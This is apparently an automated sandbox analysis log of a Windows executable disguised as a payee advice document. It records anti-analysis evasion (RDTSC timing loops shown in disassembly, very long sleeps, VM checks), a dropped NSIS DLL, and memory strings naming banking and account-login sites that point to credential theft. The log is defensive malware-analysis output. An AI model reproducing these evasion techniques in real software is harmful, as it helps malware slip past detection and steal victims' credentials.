            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeAPI/Special instruction interceptor: Address: 859F5D4
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeAPI/Special instruction interceptor: Address: 69DF5D4
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeRDTSC instruction interceptor: First address: 85408CB second address: 85408CB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FD974CD8A53h 0x00000006 test ecx, ebx 0x00000008 inc ebp 0x00000009 test eax, 2C29B192h 0x0000000e inc ebx 0x0000000f push esi 0x00000010 mov esi, 5FBFA3CCh 0x00000015 cmp esi, 33h 0x00000018 jl 00007FD974D3945Bh 0x0000001e pop esi 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeRDTSC instruction interceptor: First address: 69808CB second address: 69808CB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FD9756E0233h 0x00000006 test ecx, ebx 0x00000008 inc ebp 0x00000009 test eax, 2C29B192h 0x0000000e inc ebx 0x0000000f push esi 0x00000010 mov esi, 5FBFA3CCh 0x00000015 cmp esi, 33h 0x00000018 jl 00007FD975740C3Bh 0x0000001e pop esi 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeMemory allocated: 37490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeMemory allocated: 39490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598107Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597452Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597276Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597162Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595687Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595342Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594902Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594661Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594526Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594422Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594297Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594187Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594078Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeWindow / User API: threadDelayed 1496Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeWindow / User API: threadDelayed 8341Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 7056Thread sleep count: 1496 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 7056Thread sleep count: 8341 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -598891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -598107s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -597452s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -597276s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -597162s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -597031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -596922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -596812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -596703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -596594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -596484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -596375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -596266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -596141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -596016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -595906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -595797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -595687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -595578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -595469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -595342s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -595234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -595125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -595015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -594902s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -594661s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -594526s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -594422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -594297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -594187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812Thread sleep time: -594078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405772
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0040622D FindFirstFileW,FindClose,4_2_0040622D
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598107Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597452Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597276Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597162Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595687Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595342Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594902Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594661Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594526Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594422Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594297Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594187Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594078Jump to behavior
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
